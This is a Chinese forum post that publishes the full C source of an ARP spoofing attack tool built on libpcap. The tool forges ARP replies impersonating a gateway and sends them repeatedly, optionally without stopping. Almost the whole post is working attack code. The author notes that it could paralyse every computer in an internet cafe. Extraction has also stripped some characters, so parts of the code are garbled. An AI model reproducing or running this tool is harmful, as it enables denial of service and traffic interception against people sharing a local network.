共有回帖数 0 个
-
科普部分:
如果大家不清楚下面的概念的话,请Baidu或Google之~
1. 网络的分层
2. 链路层
3. 局域网中的arp的作用
好,下面开始贴程序……希望大家把程序用在正道上……因为稍微修改一下就可能能让一个网吧的所有电脑瘫痪…��
程序一共有5个文件,还要用到一个pcap库(因为要直接跟网卡打交道,所以……这个库既有linux版也有windows版),大家如果要编译的话要记得链接它:
linux用户:
在gcc选项里记得-lpcap
windows用户,下载好pcap库之后,在VC里面静态链接的选项里面加上��
//////////////////////////////////////////////////////////////
//main.c
/////////////////////////////////////////////////////////////
#include "arpatt.h"
int main(int argc,char *argv[]){
int i;
switch(argc){
case 2:
if(strcmp(argv[1],"-d")==0){
if(loadIniFile(NULL)){
if(buildIniFile(NULL)) return -1;
}
break;
}
if(strcmp(argv[1],"-s")==0){
if(buildIniFile(NULL)) return -1;
return 0;
}
printf("Illegal argument, run %s to see help info.n",argv[0]);
return -1;
case 3:
case 5:
case 7:
case 9:
case 11:
case 13:
for(i=1;iargc;i+=2){
if(strcmp(argv,"-gip")==0) strcpy(toip,argv[i+1]);
if(strcmp(argv,"-gmac")==0) strcpy(tomac,argv[i+1]);
if(strcmp(argv,"-aip")==0) strcpy(fromip,argv[i+1]);
if(strcmp(argv,"-amac")==0) strcpy(frommac,argv[i+1]);
if(strcmp(argv,"-f")==0) sscanf(argv[i+1],"%d",&Delay);
if(strcmp(argv,"-t")==0) sscanf(argv[i+1],"%d",&TimeLen);
}
printf("DEVICE:");
devini();
break;
default:
printf("[Powered by Ureys]%s Usage:n",argv[0]);
printf("%s -dn",argv[0]);
printf("%s [-gip GatewayIP] [-gmac GatewayMAC] [-aip AttackIP]n"
"[-amac FakeMAC] [-f Frequency] [-t time]n",argv[0]);
printf("%s -sn",argv[0]);
printf("Arguments:n"
"t-d:Use default settings.n"
"t-s:Set default file(%s won't run).n"
"t-f:Frequency:integer(second), delay between 2 packets.n"
"t-t:time:integer(second), attack will last [time] seconds.n",argv[0]);
return 0;
}
if(attPrepare()) return -1;
showGlobal();
if(attack()) return -1;
return 0;
}
//////////////////////////////////////////////////////////
//自己的头文件:arpatt.h
//////////////////////////////////////////////////////////
#ifndef ARPATT_H_
#define ARPATT_H_
#include stdio.h
#include pcap.h
#include string.h
#include stdlib.h
#include unistd.h
//===========================
#define MAXDEVNAMELEN 100
//===========================
//===========================
//inifunc.c
int devini();
int defaultInit();
int buildIniFile(const char *filename);
int loadIniFile(const char *filename);
void showGlobal();
//===========================
//===========================
//attfunc.c
int attPrepare();
int attack();
unsigned int
makeArpPack(const char *fromip,const char *frommac,const char *toip,const char* tomac);
int getDevHandle();
//===========================
extern char devname[MAXDEVNAMELEN];
extern pcap_t* devhandle;
extern char errbuf[PCAP_ERRBUF_SIZE];
extern char fromip[50];
extern char frommac[50];
extern char toip[50];
extern char tomac[50];
extern int TimeLen;
extern unsigned int Delay;
extern unsigned char arpReplyPack[];
#endif /*ARPATT_H_*/
///////////////////////////////////////////////////
//inifunc.c
//恩,逻辑结构有点不好,以后有空再改进吧~
///////////////////////////////////////////////////
#include "arpatt.h"
int devini(){
pcap_if_t *alldevsp,*p=NULL;
int i;
int c;
if(pcap_findalldevs(&alldevsp,errbuf)0){
fprintf(stderr,"find dev error=%sn",errbuf);
return -1;
}
p=alldevsp;
if(!p){
fprintf(stderr,"err:no dev/you haven't run it as rootn");
exit(1);
}
for(i=0;p;p=p-next){
printf("dev%d=%sn",i++,p-name);
printf("description=%sn",p-description);
}
printf("choose a device:");
fflush(stdin);
c=getchar();c-='0';
if(c0||c=i){
fprintf(stderr,"err:input error!n");
return -1;
}
for(i=0,p=alldevsp;ic;p=p-next);
strncpy(devname,p-name,MAXDEVNAMELEN-1);
devname[MAXDEVNAMELEN-1]='�';
pcap_freealldevs(alldevsp);
return 0;
}
int defaultInit(){
printf("From ip(eg:192.168.1.5):");
scanf("%s",fromip);
printf("From mac(eg:AA:BB:CC:DD:EE:FF):");
scanf("%s",frommac);
printf("To ip(eg:192.168.1.1):");
scanf("%s",toip);
printf("To mac(eg:00:BB:CC:AA:EE:AA):");
scanf("%s",tomac);
printf("Attack time length:");
scanf("%d",&TimeLen);
printf("Delay between two attacks:");
scanf("%d",&Delay);
return 0;
}
int buildIniFile(const char *filename){
FILE *fp;
if(devini()) exit(1);
if(defaultInit()) return -1;
if(filename)
fp=fopen(filename,"w");
else
fp=fopen("default.ini","w");
if(!fp){
fprintf(stderr,"err:Cannot create file!n");
return -1;
}
fprintf(fp,"%sn%sn%sn%sn%sn%dn%dn",devname,fromip,frommac,toip,tomac,TimeLen,Delay);
fclose(fp);
return 0;
}
int loadIniFile(const char *filename){
FILE *fp;
int status;
if(filename)
fp=fopen(filename,"r");
else
fp=fopen("default.ini","r");
if(!fp){
fprintf(stderr,"err:Cannot load file!n");
return -1;
}
status=fscanf(fp,"%sn%sn%sn%sn%sn%dn%dn",devname,fromip,frommac,toip,tomac,&TimeLen,&Delay);
if(status!=7){
fprintf(stderr,"err:bad file format!n");
return -1;
}
return 0;
}
void showGlobal(){
printf("======Current Status======n");
printf("device name=%sn",devname);
printf("From IP=%sn",fromip);
printf("From MAC=%sn",frommac);
printf("To IP=%sn",toip);
printf("To MAC=%sn",tomac);
printf("Attack time length(-1 for non-stop)=%dn",TimeLen);
printf("Delay between two attacks=%dn",Delay);
printf("==========================n");
}
//////////////////////////////////////////////////////////////////////////
//全局变量globalvar.c
//////////////////////////////////////////////////////////////////////////
#include "arpatt.h"
char errbuf[PCAP_ERRBUF_SIZE]={0};
pcap_t* devhandle=NULL;
char devname[MAXDEVNAMELEN]={0};
char fromip[50]="192.168.1.8";
char frommac[50]="AA:BB:CC:DD:EE:FF";
char toip[50]="192.168.1.1";
char tomac[50]="00:00:50:10:22:0c";
int TimeLen=-1;
unsigned int Delay=1;
unsigned char arpReplyPack[]=
{
0x00,0x00,0x50,0x10,0x22,0x0c, //Gateway MAC
0x00,0x14,0x85,0x07,0xff,0x2e, //someone's MAC
0x08,0x06, //ARP(DO NOT CHANGE)
0x00,0x01, //Hardware type:Ethernet(DO NOT CHANGE)
0x08,0x00, //Protocol type:IP(DO NOT CHANGE)
0x06, //Hardware size(DO NOT CHANGE)
0x04, //Protocol size(DO NOT CHANGE)
0x00,0x02, //Opcode:reply(DO NOT CHANGE)
0x00,0x14,0x85,0x07,0xff,0x2e, //someone's MAC
0xc0,0xa8,0x01,0x08, //someone's IP
0x00,0x00,0x50,0x10,0x22,0x0c, //Gateway MAC
0xc0,0xa8,0x01,0x01 //Gateway IP
};
//////////////////////////////////////////////////////////////////////////
//关键的几个函数attfunc.c
//////////////////////////////////////////////////////////////////////////
#include "arpatt.h"
int getDevHandle(){
devhandle=pcap_open_live(devname, BUFSIZ, 1, 0, errbuf);
if(!devhandle){
fprintf(stderr,"err:wrong handle get!n");
return -1;
}
return 0;
}
unsigned int
makeArpPack(const char *fromip,const char *frommac,const char *toip,const char* tomac){
int a[6];
int i;
unsigned int status=0;
if(4==sscanf(fromip,"%d.%d.%d.%d",a,a+1,a+2,a+3)){
for(i=28;i=31;++i)
arpReplyPack=(unsigned char)a[i-28];
}
else
status|=0x0001;
if(6==sscanf(frommac,"%x:%x:%x:%x:%x:%x",a,a+1,a+2,a+3,a+4,a+5)){
for(i=0;i=5;++i)
arpReplyPack[i+6]=arpReplyPack[i+22]=(unsigned char)a;
}
else
status|=0x0010;
if(4==sscanf(toip,"%d.%d.%d.%d",a,a+1,a+2,a+3)){
for(i=0;i=3;++i)
arpReplyPack[i+38]=(unsigned char)a;
}
else
status|=0x0100;
if(6==sscanf(tomac,"%x:%x:%x:%x:%x:%x",a,a+1,a+2,a+3,a+4,a+5)){
for(i=0;i=5;++i)
arpReplyPack=arpReplyPack[i+32]=(unsigned char)a;
}
else
status|=0x1000;
return status;
}
int attPrepare(){
if(getDevHandle()) return -1;
makeArpPack(fromip,frommac,toip,tomac);
return 0;
}
int attack(){
int count=0;
int packsize=42;
printf("ATTACK!!!n");
while(1){
if(pcap_inject(devhandle,arpReplyPack,packsize)==-1){
printf("error in sending packet");
return -1;
}
fprintf(stderr,".");
sleep(Delay);
if(TimeLen==-1) continue;
count++;
if(countTimeLen) break;
}
return 0;
}
终于贴完了阿~~~~~~~~~~~~~~~~~~~~~
总而言之这个程序的风格还是比较不好的,大家不要学,全局变量大量使用是个人的一点不好的小习惯。这个例子完全就是arp攻击的范例了,总而言之和P2P终结者有点像但又不太一样……能够控制链路层的东西,就给人一种能够操纵感,你可以利用它伪造你的IP,也可以做个爆吧机什么的(汗,怎么我没想到一个好的用途呢……)
楼主 2016-01-23 11:24 回复
Copyright © 2010~2015 直线网 版权所有,All Rights Reserved.沪ICP备10039589号
意见反馈 |
关于直线 |
版权声明 |
会员须知
